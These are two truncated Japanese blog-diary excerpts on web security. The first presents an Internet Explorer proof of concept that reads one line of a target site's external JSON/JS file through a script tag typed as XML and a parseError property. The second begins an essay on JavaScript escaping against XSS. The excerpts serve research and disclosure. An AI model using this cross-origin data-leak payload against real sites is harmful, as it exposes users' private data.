前回の当日記のJSONに関する妄想ばなしの記事において、Kanatokoさんからマジなコメントを頂いたみたいですので、補足を。 <body onload="alert(JSON.XMLDocument.parseError.srcText)" ><script id="JSON" type="text/xml" src="ターゲットの外部jsfileのURL" > </script></body>IE対象のPoCは上記のとおりです。JSONデータを１行だけ抜けます。１行になっているケースも少なくないでしょう。データ量を節約して…

XSS対策としてのいわゆるJavaScriptエスケープについての拙なる論考を、当日記で以下に記載したことがあります。http://d.hatena.ne.jp/hoshikuzu/20071011#p1さて、商用などでウェブアプリケーションを作成する場合には、おそらくHTMLでページを出力し、ピ…